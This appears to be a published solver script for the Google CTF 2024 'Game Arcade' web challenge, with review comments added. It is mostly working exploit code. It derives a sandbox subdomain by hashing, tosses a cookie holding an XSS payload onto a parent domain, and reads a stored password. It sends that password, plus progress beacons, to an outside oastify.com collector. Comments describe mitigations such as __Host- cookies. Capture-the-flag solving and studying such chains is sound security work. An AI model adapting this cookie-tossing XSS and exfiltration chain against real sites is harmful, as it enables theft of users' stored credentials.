Created
June 29, 2024 05:16
Google CTF 2024 Game Arcade solver
<body> | |
<iframe id="frame1"></iframe> | |
<iframe id="frame2"></iframe> | |
<script> | |
/**
 * Render a byte sequence as a base-36 string.
 *
 * The bytes are folded into a single unsigned big-endian integer (the first
 * byte is the most significant) and that integer is printed in radix 36.
 * Leading zero bytes do not appear in the result, and an empty input gives "0".
 *
 * @param {number[]|Uint8Array} arr - Byte values to encode.
 * @returns {string} Lower-case base-36 digits.
 */
function arrayToBase36(arr) {
  let value = 0n;
  arr.forEach((byte) => {
    // Shift the accumulator left by one byte, then append the next byte.
    value = value * 256n + BigInt(byte);
  });
  return value.toString(36);
}
/**
 * Join several binary buffers into one newly allocated ArrayBuffer.
 *
 * Each argument is read through a Uint8Array and copied, in argument order,
 * into the output. The inputs are not modified.
 *
 * @param {...(ArrayBuffer|Uint8Array)} buffers - Chunks exposing `byteLength`.
 * @returns {ArrayBuffer} The concatenated bytes (zero-length when called with no arguments).
 */
function concatBuffers(...buffers) {
  const totalBytes = buffers.reduce((sum, chunk) => sum + chunk.byteLength, 0);
  const joined = new Uint8Array(totalBytes);

  let cursor = 0;
  buffers.forEach((chunk) => {
    joined.set(new Uint8Array(chunk), cursor);
    cursor += chunk.byteLength;
  });

  return joined.buffer;
}
/**
 * Hash a list of parts into a fixed-width, 50-character base-36 label.
 *
 * String parts are UTF-8 encoded; any other part is passed through unchanged
 * and is expected to be a binary buffer. The parts are joined with the literal
 * separator "$@#|", hashed with SHA-256, and the digest is printed in base 36,
 * left-padded with "0" to 50 characters. A 256-bit value never needs more than
 * 50 base-36 digits, so the final slice does not drop any digest digits.
 *
 * NOTE(review): joining on a separator is not an unambiguous encoding. A part
 * that itself contains "$@#|" produces the same byte stream as a different
 * split of the parts. Where a label like this is meant to bind each field
 * separately, length-prefixing the fields removes that ambiguity.
 *
 * @param {...(string|ArrayBuffer)} parts - Values to bind into the hash, in order.
 * @returns {Promise<string>} 50 base-36 characters.
 */
async function calculateHash(...parts) {
  const encoder = new TextEncoder();
  const lastIndex = parts.length - 1;

  const pieces = parts.flatMap((part, index) => {
    const piece = typeof part === "string" ? encoder.encode(part).buffer : part;
    // A separator goes between parts only, never after the last one.
    return index < lastIndex ? [piece, encoder.encode("$@#|").buffer] : [piece];
  });

  const digest = await crypto.subtle.digest("SHA-256", concatBuffers(...pieces));
  const label = arrayToBase36(new Uint8Array(digest));
  return label.padStart(50, "0").slice(0, 50);
}
// Final step of the solver: point this window at the challenge page.
// main() calls it 500 ms after the payload message has been posted.
const attack = () => {
  const challengeUrl = 'https://game-arcade-web.2024.ctfcompetition.com/#1';
  window.location.href = challengeUrl;
};
// Solver entry point. In order, it:
//   1. builds an HTML document whose script sets a `password` cookie scoped to
//      a parent domain of the sandbox host,
//   2. opens shim.html on a sandbox host whose label is derived from that
//      document,
//   3. hands the document to the shim over postMessage, and
//   4. sends this window to the challenge page (attack()).
//
// Defender's reading: the cookie carries a Domain attribute, so a page on one
// sandbox subdomain can plant a cookie that the browser also sends to every
// host under that domain ("cookie tossing").
// NOTE(review): how the challenge page consumes the cookie is not visible in
// this file. The payload only has an effect if that value reaches an HTML
// sink without escaping — confirm against the target's source.
// Mitigations to check on the receiving side: host-only / `__Host-` prefixed
// cookies, treating the user-content domain as a public suffix so sibling
// origins cannot share cookies, and writing stored values with textContent
// rather than as markup.
const main = async () => {
  // First input to the hash. NOTE(review): presumably the product name the
  // shim expects; it also appears in the shim path below.
  const product = 'google-ctf'
  // Markup whose error handler reads localStorage['password'] and navigates to
  // the author's collector host with that value in the query string.
  const xss = `<img src=x onerror="location = 'https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com/?f=' + encodeURIComponent(localStorage.getItem('password'))">`
  // Document to be loaded in the sandbox: its script stores the markup above,
  // URL-encoded, in a cookie named `password` with an explicit Domain.
  // The literal's inner lines are kept unindented because `body` is hashed and
  // posted byte-for-byte.
  const body = `<body><script>
document.cookie = "password=${encodeURIComponent(xss)}; domain=.0ta1gxvglkyjct11uf3lvr9g3b45whebmhcjklt106au2kgy3e-h641507400.scf.usercontent.goog"
<\/script></body>`
  const mimeType = 'text/html;charset=utf-8'
  // The host label is the hash of (product, body, this page's origin).
  // NOTE(review): presumably this mirrors the check done inside shim.html,
  // which is not part of this file.
  const hash = await calculateHash(product, body, window.origin);
  // The sandbox host is a subdomain of the domain named in the cookie's Domain
  // attribute above, which is what lets the cookie be set for that parent.
  const url = new URL(
    `http://${hash}-h641507400.0ta1gxvglkyjct11uf3lvr9g3b45whebmhcjklt106au2kgy3e-h641507400.scf.usercontent.goog/google-ctf/shim.html`
  );
  url.searchParams.set("origin", window.origin);
  url.searchParams.set("cache", "1");
  // Open the shim in a popup and keep the handle for postMessage.
  const safeWindow = window.open(
    url,
    "_blank",
    `width=500, height=500`
  );
  // Readiness handshake: every 100 ms post `1` with a fresh MessageChannel
  // port; the first reply on port1 resolves the promise and stops the polling.
  const loadedPromise = new Promise((resolve) => {
    // Progress marker sent to the collector host.
    navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', 'window open')
    const interval = setInterval(() => {
      const messageChannel = new MessageChannel();
      messageChannel.port1.onmessage = () => {
        resolve();
        clearInterval(interval);
      };
      safeWindow.postMessage(1, url.origin, [messageChannel.port2]);
    }, 100);
  });
  // Not awaited: main() returns as soon as the handshake has been started.
  loadedPromise.then(() => {
    navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', 'send message')
    const messageChannel = new MessageChannel();
    // Whatever the shim replies is logged and forwarded to the collector host.
    messageChannel.port1.onmessage = (e) => {
      console.log(e.data);
      navigator.sendBeacon('https://3y240kppb1yhrjmi4gf4os90xr3iref3.oastify.com', e.data)
    };
    // Deliver the document; `salt` is the UTF-8 bytes of the same body.
    safeWindow.postMessage(
      { body, mimeType, salt: new TextEncoder().encode(body).buffer },
      url.origin,
      [messageChannel.port2]
    );
    // Fixed 500 ms delay before navigating to the challenge page.
    // NOTE(review): presumably this gives the sandboxed document time to run
    // and set the cookie; nothing here waits for a confirmation.
    setTimeout(() => attack(), 500)
  });
}
main()
</script> | |
</body> |